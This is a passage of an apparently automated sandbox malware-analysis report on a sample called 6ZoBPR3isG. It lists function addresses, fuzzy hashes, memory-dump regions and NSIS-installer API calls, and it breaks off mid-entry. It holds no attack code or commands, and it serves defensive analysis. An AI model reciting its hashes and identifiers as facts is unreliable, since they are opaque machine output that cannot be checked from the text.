Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f71cc77bd2b2e9567a64ea3384b65fe711dabecf8efdfb9444d7ead1473229e
Instruction ID: b98e35cda005886098176d037bb4c1d64654c3142c1cadb8f5f521e8778e2ac1
Opcode Fuzzy Hash: 3f71cc77bd2b2e9567a64ea3384b65fe711dabecf8efdfb9444d7ead1473229e
Instruction Fuzzy Hash: A9D05E360483887ECB030E618C11F993F265F26610F455096F9548E1A391225536AB65

Function 36AE4A3D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4457a2eb9a45defef88365e75138ba4cf164789816baccbc8bd31d61badbe25
Instruction ID: 59c6398de1d2efc0c246ac89ac3e690b26f50a0d295ca080e0f4b8f707287fa9
Opcode Fuzzy Hash: a4457a2eb9a45defef88365e75138ba4cf164789816baccbc8bd31d61badbe25
Instruction Fuzzy Hash: 01D0673AB44058EFDB049F98E8509DDF7B6FF98221B048116EA15A3260C6319965DBA4

Function 36AED490 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25cabde36ba9e580b0cae1bb685629f038f894d591e1c650c22b670eda1a8100
Instruction ID: 302fee54fc765b1e1992ce2739d569e89a2964b170703ffb18aaa45a7d25f0dc
Opcode Fuzzy Hash: 25cabde36ba9e580b0cae1bb685629f038f894d591e1c650c22b670eda1a8100
Instruction Fuzzy Hash: 32D01275C02308EFDB04EFA1DA05B6AF7BCEB87212F10109D990963250EB715A40D6AD

Function 36AE63D0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c46b084aceff67fe375df2795085a6c529dbf36e31efee89e04e43d1332ca424
Instruction ID: 4a9badd43f3307f07e08e558b35a156344945729ca7fef396017c472900f0288
Opcode Fuzzy Hash: c46b084aceff67fe375df2795085a6c529dbf36e31efee89e04e43d1332ca424
Instruction Fuzzy Hash: 3FD01736105284AFCB02CF24C854C843FA1AF4A21031582CAF4958F2B3C7329912CB01

Function 36AED510 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2568b67609e40d721eb292d078c008ec6fa7e1d56ccf923cec20c277cfe7fa4a
Instruction ID: 247c3e85ff1a5861ebf087967e05bb4de285113932ad7710d1f014e61edf97f3
Opcode Fuzzy Hash: 2568b67609e40d721eb292d078c008ec6fa7e1d56ccf923cec20c277cfe7fa4a
Instruction Fuzzy Hash: 1AD0C9392197429FE7038730C86189AFFA2EBD7141B15C98AE485861B3C13188569713

Function 0016F938 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 144f63ce30a1ef5f502b102cc440fde6871754cb300da327c0519bca52b43508
Instruction ID: ce4b8c0e871333f25695eee8ac5a6af901b6efd4341332c6555ddb24c681eb66
Opcode Fuzzy Hash: 144f63ce30a1ef5f502b102cc440fde6871754cb300da327c0519bca52b43508
Instruction Fuzzy Hash: 33C0127017430847E980BB71ED55555335A6AC45447948A3190081615FDF74A9368BD5

Function 36AE86A0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f09623cf27da4a827ecc56a584560b161264510f68ccbdfed54535d49812666
Instruction ID: bab98b9d5ecdcdce196ad5173c46c91aafa8e9f756199658de43d41065bf7db4
Opcode Fuzzy Hash: 7f09623cf27da4a827ecc56a584560b161264510f68ccbdfed54535d49812666
Instruction Fuzzy Hash: CFC04C2088D3935FCF02667144151917BB15D43A1430D42DAC449DB156953A9C0ACF62

Function 00166B3B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b64f9b998fe64bf45ac1ab870f4bd7ed5e92039d0e00e0221a984f06f7335ca
Instruction ID: ea8cd558c3a6c5fc3bc06c69a42308a26123399875555e512f40259a7733134e
Opcode Fuzzy Hash: 2b64f9b998fe64bf45ac1ab870f4bd7ed5e92039d0e00e0221a984f06f7335ca
Instruction Fuzzy Hash: 3CB02233B08000CBCA080280FC002FCB320EB8822AF020033E22A80882C338033BA282

Function 00166B48 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85d5880eaafc580116f630a0d6eda6804f19a26535adf999207267782f1c9fa2
Instruction ID: 27cf88bba3aa7afe081b1b3841a444c9ecac41bd27cac655937a4aaeb08fdc6b
Opcode Fuzzy Hash: 85d5880eaafc580116f630a0d6eda6804f19a26535adf999207267782f1c9fa2
Instruction Fuzzy Hash: B4B09237B49419DBEA185694FC052FDB320EB8436AF210177E22A82881D739066B66A6

Function 36AE63E0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3149f4f4fc105d6bf32d0386041484630c98668247894b28e24961094e4423d
Instruction ID: 3dc8cf8d8c7f74d3825886a6f4120fff88a9cdc2e87ed174b79ee8c745c30c2f
Opcode Fuzzy Hash: b3149f4f4fc105d6bf32d0386041484630c98668247894b28e24961094e4423d
Instruction Fuzzy Hash: 2DC0123A100208EFCB00DF88C844C947BA9FF087107108088FA094F232C732E821DB40

Function 00164850 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dfa2d83c9f02f20c9801d3082567d47436ed3126817d67bb1118f111acf0806
Instruction ID: b02dc14af9b19887f52c2866de87e62717fda94bf4326ad14693eb7e890f47af
Opcode Fuzzy Hash: 4dfa2d83c9f02f20c9801d3082567d47436ed3126817d67bb1118f111acf0806
Instruction Fuzzy Hash: 2AB092744443088F8340EF96F9045203BE8B7842813800226D40E82A91E73091508B90

Function 36AED520 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86381a2b7f1b35c248ac9a2e7863932f3daa5c3e484b82c862647da7f286d2fc
Instruction ID: a1e537f6d91b10d9a76c7b689528a6a8b95f75ce6044f0f05c4baa08d549aca9
Opcode Fuzzy Hash: 86381a2b7f1b35c248ac9a2e7863932f3daa5c3e484b82c862647da7f286d2fc
Instruction Fuzzy Hash: 30B0923D208202EBCB05DB04D800D0FFBA3AFD8240F00C81CA08812271C632C8609A12

Non-executed Functions

Function 004034A5 Relevance: 75.7, APIs: 32, Strings: 11, Instructions: 410stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004034C8
GetVersion.KERNEL32 ref: 004034CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
OleInitialize.OLE32(00000000), ref: 00403545
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
ExitProcess.KERNEL32 ref: 0040383A
lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
CopyFileW.KERNEL32(00438800,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

TEMP, xrefs: 0040372D
Low, xrefs: 0040371B
.tmp, xrefs: 00403861
UXTHEME, xrefs: 004034F5, 004034FA, 00403500
NSIS Error, xrefs: 00403567
SeShutdownPrivilege, xrefs: 0040396F
TMP, xrefs: 00403735
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
\Temp, xrefs: 004036FF
~nsu, xrefs: 00403845
Error launching installer, xrefs: 004037D0

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-334447862
Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,00000408), ref: 00404DEF
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,?), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

N, xrefs: 00405057
, xrefs: 00405385
M, xrefs: 00404F76

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 00405AFA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00437800,76133180,00000000), ref: 00405B23
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,76133180,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,76133180,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,76133180,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,76133180,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

\*.*, xrefs: 00405B65
0WB, xrefs: 00405B53

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: 0WB$\*.*
API String ID: 2035342205-351390296
Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45

Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76133180,00405B1A,?,00437800,76133180), ref: 00406736
FindClose.KERNEL32(00000000), ref: 00406742

Strings

xgB, xrefs: 0040672C

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

Function 371F44CF Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b32e2315b1c89c2952a9ab496cd8abdfc1cd3734c9a3f89d82bae6d7077594ac
Instruction ID: 6abf71fb7abf42bb5f6252b0f9c382848e58a897a8bc2e44bc4cde51ca2395cb
Opcode Fuzzy Hash: b32e2315b1c89c2952a9ab496cd8abdfc1cd3734c9a3f89d82bae6d7077594ac
Instruction Fuzzy Hash: 7E629974E05228CFEB65DF65C894BDDBBB2BB89301F1081EAD849A7250DB319E81DF50

Function 36B9C4B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d6b1444d1f00e466bb265acdcd9bdce3b43d2d64a2892d6fdd30884d993943b
Instruction ID: f75a18e0aaad14a6abd60ce31969b55c37abd9b2f0c2ccd617e8702c42487af6
Opcode Fuzzy Hash: 3d6b1444d1f00e466bb265acdcd9bdce3b43d2d64a2892d6fdd30884d993943b
Instruction Fuzzy Hash: AEC19174E00218CFEB14DFA5D994BADBBF2BF89304F1081A9D409AB395DB359A85CF50

Function 36B9F280 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad16eadb8a2132bffda3a5bbd4f8c7536361ffa01eb7b4b6fac96fd4ff476117
Instruction ID: 74b762dcc6260d565b3c8e6b018b9a2ef0f32ebd579e77bd4544d215b7210579
Opcode Fuzzy Hash: ad16eadb8a2132bffda3a5bbd4f8c7536361ffa01eb7b4b6fac96fd4ff476117
Instruction Fuzzy Hash: 35C19E74E00218CFEB14DFA5D994BDDBBF2AF89304F2081A9D409AB395DB359A85CF10

Function 36B9AEF8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac22ea477d1878881e2d99a6fa3eeeed9b2bfb00151766d3cc50765f3e211473
Instruction ID: 7ad250c7c423c4da25fae0bcda5e3d72b7e59020e2e761d52a6314d08ad156dd
Opcode Fuzzy Hash: ac22ea477d1878881e2d99a6fa3eeeed9b2bfb00151766d3cc50765f3e211473
Instruction Fuzzy Hash: 02C19E74E00218CFEB54DFA5D994BDDBBF2AF89304F2080A9D409AB395DB359A85CF10

Function 36B984F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41bc3fca9260eead8806142347605b013aaa7e132c46335b0ff92bf1dd59b640
Instruction ID: 1ebb9bc4d60cd84956c0536fdbb971cff6e17b3248141dcc9bbc57c86aced200
Opcode Fuzzy Hash: 41bc3fca9260eead8806142347605b013aaa7e132c46335b0ff92bf1dd59b640
Instruction Fuzzy Hash: 1EC18E74E00218CFEB14DFA5D994B9DBBF2BF89304F2080A9D409AB395DB359A85CF51

Function 36B9F6D8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2893eab9e4a004917d38396e0edeab68c6a74027c583ddeecdd18a3d5406f3d3
Instruction ID: ddcfddbdb3e075dcdd1794e799c0e83283aff44b040164ad8c229bd53cabe309
Opcode Fuzzy Hash: 2893eab9e4a004917d38396e0edeab68c6a74027c583ddeecdd18a3d5406f3d3
Instruction Fuzzy Hash: 40C19D74E00218CFEB14DFA5D994BDDBBF2AF89304F2080A9D409AB395DB359A85CF10

Function 36B9DCC8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d1a43d29148f5a3ec023fbd20b501e9613325eeb230146e23814ead95feb320
Instruction ID: 3d3a190620b52e02629ac369f8a8b9bc6dd09efab02cd9f3f8ec37a2248140fb
Opcode Fuzzy Hash: 4d1a43d29148f5a3ec023fbd20b501e9613325eeb230146e23814ead95feb320
Instruction Fuzzy Hash: 6BC19E74E00218CFEB14DFA5D994B9DBBF2BF89304F2080A9D409AB395DB359A85CF51

Function 36B9EE28 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87cf3a4d51effb28672bc1b869ed7b4e344e4e52f973d9e736c7cd0293a43565
Instruction ID: b9666f8bb59192fb326fa287e1072de37057f22d70ffb562d51dc56e32ec8cac
Opcode Fuzzy Hash: 87cf3a4d51effb28672bc1b869ed7b4e344e4e52f973d9e736c7cd0293a43565
Instruction Fuzzy Hash: 2EC19D74E00218CFEB54DFA5D994BDDBBF2AF89304F2081A9D409AB395DB359A85CF10

Function 36B9BC00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

